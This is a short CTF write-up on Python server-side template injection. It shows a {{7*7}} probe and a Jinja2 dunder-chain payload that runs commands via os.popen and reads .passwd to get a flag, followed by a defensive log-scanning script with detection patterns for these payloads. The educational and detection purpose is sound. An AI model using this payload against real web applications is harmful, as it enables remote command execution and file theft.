Python-Server-side-Template-Injection-Introduction | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.


By supplying {{7*7}} and receiving 49 back, we can assume SSTI is working here.

So, I simply went to the PayloadsAllTheThings SSTI section and grabbed this payload, which is listed there as "Exploit the SSTI by calling os.popen().read()":

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Then, as you can see, the command id executed and its output came back in the rendered page.

So, I ran ls, saw that the file .passwd exists, and read it with cat .passwd to obtain the flag.

Flag: Python_SST1_1s_co0l_4nd_mY_p4yl04ds_4r3_1ns4n3!!!
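As an added defensive example (not part of the original writeup), the Python below scans web-server access-log lines for the two stages shown above: the {{7*7}} arithmetic probe and the dunder-chain payload ending in popen(). The log format, the sample lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicators of template-injection probing, roughly in order of severity:
# an arithmetic probe such as {{7*7}} (recon), the dunder attribute chain used to
# reach __import__ from a Jinja2 context, and a command-execution sink such as popen(.
SSTI_INDICATORS = {
    "arith_probe": re.compile(r"(?:\{\{|\$\{|\{%|<%=)\s*\d+\s*[*+\-]\s*\d+"),
    "dunder_chain": re.compile(r"__(?:class|init|globals|builtins|import|subclasses|mro)__"),
    "exec_sink": re.compile(r"\b(?:popen|system|subprocess|check_output)\s*\("),
}

# Combined-style access-log line (constructed format, not from the writeup).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def ssti_indicators(raw_path):
    """Return the sorted indicator names found in a request path after URL-decoding.
    Decoding twice catches double-encoded probes; plain text is unchanged by it."""
    decoded = raw_path
    for _ in range(2):
        decoded = unquote_plus(decoded)
    return sorted(name for name, rx in SSTI_INDICATORS.items() if rx.search(decoded))

def scan_access_log(lines):
    """One finding per suspicious request: source IP, indicators hit, and the status
    (a 200 right after an arithmetic probe is the pattern worth triaging first)."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = ssti_indicators(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")), "indicators": hits})
    return findings

# Constructed sample log: one benign request, the {{7*7}} probe, then the popen() payload.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:00:07 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.9 - - [12/Mar/2024:10:00:19 +0000] "GET /?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__(%27os%27).popen(%27id%27).read()%20%7D%7D HTTP/1.1" 200 640
""".splitlines()

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```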